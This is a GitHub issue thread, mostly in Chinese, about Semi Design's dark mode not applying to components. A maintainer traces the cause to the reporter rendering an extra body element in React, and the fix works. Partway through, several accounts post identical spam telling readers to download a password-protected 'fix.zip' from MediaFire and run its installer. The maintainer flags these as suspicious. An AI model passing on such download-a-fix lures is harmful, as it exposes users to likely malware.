### ISSUE TITLE
[BUG] 暗色模式无法应用到组件

### ISSUE THREAD

**Issue by algfwq** [DouyinFE/semi-design#2450]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Which Component

暗色模式

### Semi Version

2.63.1

### Current Behavior

![image](https://github.com/user-attachments/assets/a95c3744-44ab-4ad1-a707-33bd82d32063)
暗色模式无法应用到组件

### Expected Behavior

暗色模式被应用

### Steps To Reproduce

我使用了暗色模式
CodeSandBox：https://codesandbox.io/p/github/algfwq/dangerousbugs-web/master?file=%2Fsrc%2Fmain.js%3A21%2C17&import=true

### ReproducibleCode

```markdown
//main.js
import React from 'react';
import {useDispatch} from 'react-redux';
import {switchToLoad, switchToMain} from './actions';
import {Button, Toast} from '@douyinfe/semi-ui';
import {Carousel, Typography, Space} from '@douyinfe/semi-ui';
import {Lottie} from '@douyinfe/semi-ui';
import './index.css';


const Main = () => {
    //计时器
    let connectionStartTime;
    //开始计时
    connectionStartTime = Date.now();

    //深色浅色模式跟随系统
    const switchMode = () => {
        const body = document.body;
        if (body.hasAttribute('theme-mode')) {
            body.removeAttribute('theme-mode');
        } else {
            body.setAttribute('theme-mode', 'dark');
        }
    };

    const dispatch = useDispatch();

    const handleSwitchToLoad = () => {
        dispatch(switchToLoad());
    };

    const [Loading, setLoading] = React.useState(true);

    const StopLoading = () => {
        setLoading(false);
    };

    //获取加载动画URL
    const protocol = window.location.protocol;
    const host = window.location.host;
    const url = `${protocol}//${host}/download/LoadLottie/load.json`;
    console.log("获取加载动画URL：", url);

    const jsonURL =
        'http://127.0.0.1:8080/download/LoadLottie/load.json';

    //websocket连接
    // 获取当前页面的主机名和端口号
    const protocolWebsocket = window.location.protocol === 'https:' ? 'wss:' : 'ws:';
    const hostWebsocket = window.location.host;
    const urlWebsocket = `${protocolWebsocket}//${hostWebsocket}/main/`;
    console.log("websocket连接地址：", urlWebsocket);

    const UrlWebSocket = "ws://127.0.0.1:8080/main/";

    const socket = new WebSocket(UrlWebSocket);

    socket.onclose = () => {
        console.log("websocket连接关闭");
    }

    socket.onmessage = (message) => {
        // 接收到消息
        console.log("websocket接收到消息：", message);
        // 解析消息
        const data = JSON.parse(message.data);
        // 判断消息类型
        console.log(data.mode)

        if (data.mode === 'stop_loading') {
            //停止计时
            const connectionEndTime = Date.now();
            const connectionTime = connectionEndTime - connectionStartTime;
            console.log("连接时间：", connectionTime);
            // 延迟30秒停止加载动画
            if (connectionTime < 5000) { // 5秒 = 5000毫秒
                setTimeout(StopLoading, 5000 - connectionTime);
            } else {
                StopLoading();
            }
        }
    }

    //轮播图配置
    const {Title, Paragraph} = Typography;

    const style = {
        width: '100%',
        height: '400px',
    };

    const titleStyle = {
        position: 'absolute',
        top: '100px',
        left: '100px',
        color: '#1C1F23'
    };

    const colorStyle = {
        color: '#1C1F23'
    };

    //工作室LOGO
    const URL_LOGO = `${protocol}//${host}/download/logo/logo.png`;
    const renderLogo = () => {
        return (
            <img
                // src={URL_LOGO}
                src="http://127.0.0.1:8080/download/logo/logo.png"
                alt='semi_logo' style={{width: 87, height: 31}}/>
        );
    };

    const imgList = [
        'https://lf3-static.bytednsdoc.com/obj/eden-cn/hjeh7pldnulm/SemiDocs/bg-1.png',
        'https://lf3-static.bytednsdoc.com/obj/eden-cn/hjeh7pldnulm/SemiDocs/bg-2.png',
        'https://lf3-static.bytednsdoc.com/obj/eden-cn/hjeh7pldnulm/SemiDocs/bg-3.png',
    ];

    const textList = [
        ['Semi', '从 Semi Design，到 Any Design', '快速定制你的设计系统，并应用在设计稿和代码中'],
        ['Semi 物料市场', '面向业务场景的定制化组件，支持线上预览和调试', '内容由 Semi Design 用户共建'],
        ['Semi Template', '高效的 Design2Code 设计稿转代码', '海量 Figma 设计模板一键转为真实前端代码'],
    ];


    return (
        <>
            {Loading === true && (
                <>
                    <body>
                    <div style={{display: 'flex', justifyContent: 'center', alignItems: 'center', height: '100vh'}}>
                        <Lottie params={{path: jsonURL}} width={'300px'} height={'300'}/>
                    </div>
                    </body>
                </>
            )}
            {Loading === false && (
                <>
                    <body>
                    <Carousel style={style} theme='dark'>
                        {
                            imgList.map((src, index) => {
                                return (
                                    <div key={index}
                                         style={{backgroundSize: 'cover', backgroundImage: `url('${src}')`}}>
                                        <Space vertical align='start' spacing='medium' style={titleStyle}>
                                            {renderLogo()}
                                            <Title heading={2} style={colorStyle}>{textList[index][0]}</Title>
                                            <Space vertical align='start'>
                                                <Paragraph style={colorStyle}>{textList[index][1]}</Paragraph>
                                                <Paragraph style={colorStyle}>{textList[index][2]}</Paragraph>
                                            </Space>
                                        </Space>
                                    </div>
                                );
                            })
                        }
                    </Carousel>
                    <br/><br/>
                    <Button onClick={switchMode}>切换模式</Button>
                    </body>
                </>
            )}
        </>
    );
}

export default Main;



//index.css
body {
    color: var(--semi-color-text-0);
    background-color: var( --semi-color-bg-0);
}
```

### Environment

```markdown
- OS: Windows11 24H2
- browser: Edge
```

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by algfwq** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Why?

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by algfwq** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

你是什么意思啊，我为什么要下载这玩意？
What do you mean? Why should I download this thing?

**Comment by pointhalo** [comment]
1. Please do not click on suspicious links. This post looks like a robot post .we don't know what it is. I will delete it 
![image](https://github.com/user-attachments/assets/9d61a3f4-981a-425d-a6f3-bc204c775dde)

**Comment by pointhalo** [comment]
1 没看懂你的预期是什么
2 暗色模式不会影响图片的渲染色

**Comment by algfwq** [comment]
> 1 没看懂你的预期是什么 2 暗色模式不会影响图片的渲染色

不是，你不能看到图片吗？渲染图下面还有一个按钮，无法跟随暗色模式

**Comment by algfwq** [comment]
> 1 没看懂你的预期是什么 2 暗色模式不会影响图片的渲染色

中间还有两个<br />，也是浅色的

**Comment by algfwq** [comment]
> 1 没看懂你的预期是什么 2 暗色模式不会影响图片的渲染色

中间还有两个《br》，也是浅色的

**Comment by pointhalo** [comment]
![image](https://github.com/user-attachments/assets/f9d13fbc-2cdb-4b07-8ab6-df66a688a832)
这个sandbox无法run起来

![image](https://github.com/user-attachments/assets/a432b442-c9bc-4cca-92f9-f15ef2fdac24)
但这里代码写得不对吧
你并不需要自己render 一个body。你可以inspect看一下dom，你这里的点击应该没有办法正确地往 document.body上挂 attribute ：theme-mode

**Comment by algfwq** [comment]
> ![image](https://private-user-images.githubusercontent.com/88709023/361441638-f9d13fbc-2cdb-4b07-8ab6-df66a688a832.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2Nzc5MzcsIm5iZiI6MTcyNDY3NzYzNywicGF0aCI6Ii84ODcwOTAyMy8zNjE0NDE2MzgtZjlkMTNmYmMtMmNkYi00YjA3LThhYjYtZGY2NmE2ODhhODMyLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDEzMDcxN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTlhZTllYjAwMDIwMTI3MGRjNTk4ZDFjNmRkNWI1ZWQ1ZmU5ZGNjYmMzNzU4Mzc3NmZkYTM0OThjMGM1ZDljMDImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.eV22UM0vfbei44mlgEeimnHdtJSVfnN8thf4pbpuU5o) 这个sandbox无法run起来
> 
> ![image](https://private-user-images.githubusercontent.com/88709023/361441047-a432b442-c9bc-4cca-92f9-f15ef2fdac24.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2Nzc5MzcsIm5iZiI6MTcyNDY3NzYzNywicGF0aCI6Ii84ODcwOTAyMy8zNjE0NDEwNDctYTQzMmI0NDItYzliYy00Y2NhLTkyZjktZjE1ZWYyZmRhYzI0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDEzMDcxN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTU0ZDM4NGY3ZDcwZjc4OWFmZTQxNjQ4NzhjNDZmZGYwYjAxOGY0N2Y0MjBjMjNiNTIzMGMzYjU0Njk0NWQzZjkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.mQhoZZKV-_akRqLIMKwHvEdtigkKD4usQwr-xS4H_UU) 但这里代码写得不对吧 你并不需要自己render 一个body。你可以inspect看一下dom，你这里的点击应该没有办法正确地往 document.body上挂 attribute ：theme-mode

请问我应该怎么做？

**Comment by pointhalo** [comment]
@algfwq 在你的render里去掉body这一层，即上图标红的两个开标签以及它对应的闭标签。

你的html里本身就已经有了 body，react掌控的是 document下root div的渲染。你不需要再额外渲染一个body
![image](https://github.com/user-attachments/assets/a94193fc-e4cc-4c81-9816-fce6a551d50d)

![image](https://github.com/user-attachments/assets/ca1d2747-d655-4328-b179-60b01154da17)

**Comment by algfwq** [comment]
> @algfwq 在你的render里去掉body这一层，即上图标红的两个开标签以及它对应的闭标签。
> 
> 你的html里本身就已经有了 body，react掌控的是 document下root div的渲染。你不需要再额外渲染一个body ![image](https://private-user-images.githubusercontent.com/88709023/361444271-a94193fc-e4cc-4c81-9816-fce6a551d50d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2Nzg2MDAsIm5iZiI6MTcyNDY3ODMwMCwicGF0aCI6Ii84ODcwOTAyMy8zNjE0NDQyNzEtYTk0MTkzZmMtZTRjYy00YzgxLTk4MTYtZmNlNmE1NTFkNTBkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDEzMTgyMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTg0NTI0MzY0YzA2MjBjMjYxYjIxNjZjNTcyZjc2N2E1NmJkZTA5NTA4ZWNkNDQ4ODRjNWY5MzI0OGZjYjgwNjYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.KtlLq88MK32bQsfR4S0aXo40jUMfy08uq_2nRXP37jQ)
> 
> ![image](https://private-user-images.githubusercontent.com/88709023/361444020-ca1d2747-d655-4328-b179-60b01154da17.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2Nzg2MDAsIm5iZiI6MTcyNDY3ODMwMCwicGF0aCI6Ii84ODcwOTAyMy8zNjE0NDQwMjAtY2ExZDI3NDctZDY1NS00MzI4LWIxNzktNjBiMDExNTRkYTE3LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDEzMTgyMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTdkZjE5YTNhZTQxMTEyNGFjNjdhZGIzZDU2MDc3MjEwYzZjZmRlNDU0NzQ2MDNmMzg3MTZhODA2MGE1YjVjYjkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0._mvLM7hqYybiSQjcNX7lLwngZnwVdKH3XtYDyW9pU-k)

感谢！现在正常了！
